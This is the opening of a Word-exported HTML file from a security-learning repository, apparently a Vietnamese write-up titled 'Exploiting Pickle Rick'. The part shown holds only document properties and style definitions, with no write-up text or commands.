mirror of
https://github.com/haudang217/LearningSecurity.git
synced 2026-02-04 23:59:09 +00:00
3027 lines
167 KiB
HTML
3027 lines
167 KiB
HTML
<html xmlns:v="urn:schemas-microsoft-com:vml"
|
||
xmlns:o="urn:schemas-microsoft-com:office:office"
|
||
xmlns:w="urn:schemas-microsoft-com:office:word"
|
||
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
|
||
xmlns="http://www.w3.org/TR/REC-html40">
|
||
|
||
<head>
|
||
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
|
||
<meta name=ProgId content=Word.Document>
|
||
<meta name=Generator content="Microsoft Word 15">
|
||
<meta name=Originator content="Microsoft Word 15">
|
||
<link rel=File-List href="Khai%20thác%20Pickle%20Rick%20_files/filelist.xml">
|
||
<link rel=Edit-Time-Data
|
||
href="Khai%20thác%20Pickle%20Rick%20_files/editdata.mso">
|
||
<!--[if !mso]>
|
||
<style>
|
||
v\:* {behavior:url(#default#VML);}
|
||
o\:* {behavior:url(#default#VML);}
|
||
w\:* {behavior:url(#default#VML);}
|
||
.shape {behavior:url(#default#VML);}
|
||
</style>
|
||
<![endif]--><!--[if gte mso 9]><xml>
|
||
<o:DocumentProperties>
|
||
<o:Author>Đặng Thanh Hậu</o:Author>
|
||
<o:LastAuthor>Đặng Thanh Hậu</o:LastAuthor>
|
||
<o:Revision>2</o:Revision>
|
||
<o:TotalTime>2</o:TotalTime>
|
||
<o:Created>2022-08-15T14:37:00Z</o:Created>
|
||
<o:LastSaved>2022-08-15T14:37:00Z</o:LastSaved>
|
||
<o:Pages>15</o:Pages>
|
||
<o:Words>1677</o:Words>
|
||
<o:Characters>9562</o:Characters>
|
||
<o:Lines>79</o:Lines>
|
||
<o:Paragraphs>22</o:Paragraphs>
|
||
<o:CharactersWithSpaces>11217</o:CharactersWithSpaces>
|
||
<o:Version>16.00</o:Version>
|
||
</o:DocumentProperties>
|
||
<o:OfficeDocumentSettings>
|
||
<o:AllowPNG/>
|
||
</o:OfficeDocumentSettings>
|
||
</xml><![endif]-->
|
||
<link rel=themeData href="Khai%20thác%20Pickle%20Rick%20_files/themedata.thmx">
|
||
<link rel=colorSchemeMapping
|
||
href="Khai%20thác%20Pickle%20Rick%20_files/colorschememapping.xml">
|
||
<!--[if gte mso 9]><xml>
|
||
<w:WordDocument>
|
||
<w:TrackMoves>false</w:TrackMoves>
|
||
<w:TrackFormatting/>
|
||
<w:PunctuationKerning/>
|
||
<w:ValidateAgainstSchemas/>
|
||
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
|
||
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
|
||
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
|
||
<w:DoNotPromoteQF/>
|
||
<w:LidThemeOther>EN-US</w:LidThemeOther>
|
||
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
|
||
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
|
||
<w:Compatibility>
|
||
<w:BreakWrappedTables/>
|
||
<w:SnapToGridInCell/>
|
||
<w:WrapTextWithPunct/>
|
||
<w:UseAsianBreakRules/>
|
||
<w:DontGrowAutofit/>
|
||
<w:SplitPgBreakAndParaMark/>
|
||
<w:EnableOpenTypeKerning/>
|
||
<w:DontFlipMirrorIndents/>
|
||
<w:OverrideTableStyleHps/>
|
||
</w:Compatibility>
|
||
<m:mathPr>
|
||
<m:mathFont m:val="Cambria Math"/>
|
||
<m:brkBin m:val="before"/>
|
||
<m:brkBinSub m:val="--"/>
|
||
<m:smallFrac m:val="off"/>
|
||
<m:dispDef/>
|
||
<m:lMargin m:val="0"/>
|
||
<m:rMargin m:val="0"/>
|
||
<m:defJc m:val="centerGroup"/>
|
||
<m:wrapIndent m:val="1440"/>
|
||
<m:intLim m:val="subSup"/>
|
||
<m:naryLim m:val="undOvr"/>
|
||
</m:mathPr></w:WordDocument>
|
||
</xml><![endif]--><!--[if gte mso 9]><xml>
|
||
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
|
||
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
|
||
LatentStyleCount="376">
|
||
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
|
||
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
|
||
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 6"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 7"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 8"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index 9"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 1"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 2"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 3"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 4"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 5"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 6"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 7"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 8"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="toc 9"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Normal Indent"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="footnote text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="annotation text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="header"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="footer"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="index heading"/>
|
||
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="table of figures"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="envelope address"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="envelope return"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="footnote reference"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="annotation reference"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="line number"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="page number"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="endnote reference"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="endnote text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="table of authorities"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="macro"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="toa heading"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Bullet"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Number"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Bullet 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Bullet 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Bullet 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Bullet 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Number 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Number 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Number 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Number 5"/>
|
||
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Closing"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Signature"/>
|
||
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text Indent"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Continue"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Continue 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Continue 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Continue 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="List Continue 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Message Header"/>
|
||
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Salutation"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Date"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text First Indent"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text First Indent 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Note Heading"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text Indent 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Body Text Indent 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Block Text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Hyperlink"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="FollowedHyperlink"/>
|
||
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
|
||
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Document Map"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Plain Text"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="E-mail Signature"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Top of Form"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Bottom of Form"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Normal (Web)"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Acronym"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Address"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Cite"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Code"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Definition"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Keyboard"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Preformatted"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Sample"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Typewriter"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="HTML Variable"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Normal Table"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="annotation subject"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="No List"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Outline List 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Outline List 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Outline List 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Simple 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Simple 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Simple 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Classic 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Classic 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Classic 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Classic 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Colorful 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Colorful 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Colorful 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Columns 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Columns 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Columns 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Columns 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Columns 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 6"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 7"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Grid 8"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 4"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 5"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 6"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 7"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table List 8"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table 3D effects 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table 3D effects 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table 3D effects 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Contemporary"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Elegant"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Professional"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Subtle 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Subtle 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Web 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Web 2"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Web 3"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Balloon Text"/>
|
||
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Table Theme"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
|
||
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
|
||
<w:LsdException Locked="false" Priority="34" QFormat="true"
|
||
Name="List Paragraph"/>
|
||
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
|
||
<w:LsdException Locked="false" Priority="30" QFormat="true"
|
||
Name="Intense Quote"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
|
||
